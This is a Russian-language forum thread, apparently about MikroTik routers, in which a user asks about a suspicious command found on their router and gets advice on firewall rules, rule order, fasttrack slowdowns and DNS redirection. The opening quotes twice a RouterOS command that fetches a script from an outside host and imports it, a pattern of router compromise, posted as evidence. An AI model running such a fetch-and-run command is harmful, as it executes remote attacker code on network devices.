Код: Выделить всё
/tool fetch url=http://ciskotik.com/poll/4e24192a-ecb2-4a45-81bd-b0fb225410e5 mode=http dst-path=7xe7zt46hb08
/import 7xe7zt46hb08
Что это может быть?
Код: Выделить всё
/tool fetch url=http://ciskotik.com/poll/4e24192a-ecb2-4a45-81bd-b0fb225410e5 mode=http dst-path=7xe7zt46hb08
/import 7xe7zt46hb08
Какой выход из таких ситуаций, правильный. Нужно заново перенас троить роутер? Или всего лишь удалить запись, но не известно ещё что-то может быть. И как защитится от подобного в будущем?Sir_Prikol писал(а): ↑03 фев 2019, 16:09 Взлом, или кто-то пошутил
Проверяем юзеров, порты, фаер....
Мои настройки firewall filter, закрыты все порты кроме тех которые нужны для PPTP.Sir_Prikol писал(а): ↑03 фев 2019, 18:38 Правильный - настройка фаервола, ограничения юзеров, запрет портов...
Код: Выделить всё
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input comment=bestpratice dst-port=23023 protocol=tcp
add action=accept chain=forward in-interface=bridge1-NET-V out-interface=\
bridge2-NET-E
add action=accept chain=forward in-interface=bridge2-NET-E out-interface=\
bridge1-NET-V
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
protocol=gre
add action=drop chain=input comment="Close all ports" in-interface=\
ether9-WAN-E
add action=drop chain=input comment="Close all ports" in-interface=\
ether1-WAN-V
Код: Выделить всё
/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether1
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related routing-mark=main
add action=accept chain=forward comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether1
PPTP — предполагаю, что да.
Я выше написал, как побороть:
О том месте, где я так говорил
Код: Выделить всё
/ip firewall filter add chain=input action=drop
Нет. У вас сейчас настроено:
Код: Выделить всё
/ip firewall filter add chain=input action=drop
Код: Выделить всё
/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related" \
connection-state=established,related
add action=accept chain=forward in-interface=bridge1-NET-V out-interface=\
bridge2-NET-E
add action=accept chain=forward in-interface=bridge2-NET-E out-interface=\
bridge1-NET-V
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=ether9-WAN-E
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related
add action=drop chain=forward comment="defconf: drop invalid" \
connection-state=invalid
add action=drop chain=forward comment=\
"defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
"defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
connection-state=new in-interface=ether9-WAN-E
Код: Выделить всё
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related
Вот так, есть значение полследовательность всех этих правел? В такой последовательности и внесении вашего последнего правила из спойлера что вы мне давали, в бридже ether9-WAN-E пропадает интернет!
Код: Выделить всё
/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" \
connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=\
bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=\
bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=ether9-WAN-E
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" \
connection-state=invalid
add action=drop chain=forward comment=\
"defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
"defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
connection-state=new in-interface=ether9-WAN-E
add action=drop chain=input
Код: Выделить всё
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related
Подскажите пожалуйста правильность расположения правил согласно моему листу правил.Sir_Prikol писал(а): ↑06 фев 2019, 17:53 Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети
Правила в файрволле ВСЕГДА имеют значение по очерёдности.
Код: Выделить всё
/ip firewall filter add chain=input action=drop
Код: Выделить всё
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related
При активировании этого правила, выхода в интернет нет только на bridge2-NET-E на bridge1-NET-V все хорошо.Chupaka писал(а): ↑06 фев 2019, 18:10 "Пропадает Интернет" - это что значит? Юзеры ходят в Интернет через chain=forward, и то, что вы блокируете chain=input, вообще не должно влиять на хождение пакетов пользователей в Интернет.
Другое дело, что доступ из локалки к роутеру при необходимости бы оставить (например, если роутер является DNS-сервером для пользователей)
Код: Выделить всё
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related
Если вы имеете ввиду свой лист правил:r136a8 писал(а): ↑06 фев 2019, 18:08Подскажите пожалуйста правильность расположения правил согласно моему листу правил.Sir_Prikol писал(а): ↑06 фев 2019, 17:53 Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети
Правила в файрволле ВСЕГДА имеют значение по очерёдности.
А почему же в другой моей сети bridge2-NET-E пропадает интернет при добавлении вот этого правилаА относительно Фасттрак при активировании этих правил у меня очень падает скорость интернета. По bridge2-NET-E с 75Mb до 2 MB, по bridge1-NET-V с 170Mb до 60 MbКод: Выделить всё
/ip firewall filter add chain=input action=drop
Код: Выделить всё
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \ connection-state=established,related add action=accept chain=forward comment="defconf: accept established,related" \ connection-state=established,related
Код: Выделить всё
/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether9-WAN-E
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment="defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether9-WAN-E
add action=drop chain=input
Мне нужно добавить вот такое правило?Sir_Prikol писал(а): ↑06 фев 2019, 19:34 У вас через фаервол фильтруются всего 2 интерфейса (ether1 и ether9) но не фильтруется pptp интерфейс
Код: Выделить всё
/ip firewall filter
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=pptp-out1
Код: Выделить всё
/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" \
connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=\
bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=\
bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=ether9-WAN-E
add action=drop chain=input
add action=drop chain=input comment="defconf: drop all from WAN" \
in-interface=pptp-out1
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" \
connection-state=invalid
add action=drop chain=forward comment=\
"defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
"defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
connection-state=new in-interface=ether9-WAN-E
Код: Выделить всё
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
connection-state=established,related
Код: Выделить всё
/ip firewall filter add chain=input action=drop
Код: Выделить всё
/ip firewall nat
add action=dst-nat chain=dstnat dst-port=53 protocol=udp src-address-list=\
Kids-List to-addresses=77.88.8.7
add action=dst-nat chain=dstnat dst-port=53 protocol=tcp src-address-list=\
Kids-List to-addresses=77.88.8.3
add action=dst-nat chain=dstnat dst-port=53 protocol=udp src-address-list=\
Parents-List to-addresses=176.103.130.130
add action=dst-nat chain=dstnat dst-port=53 protocol=tcp src-address-list=\
Parents-List to-addresses=176.103.130.130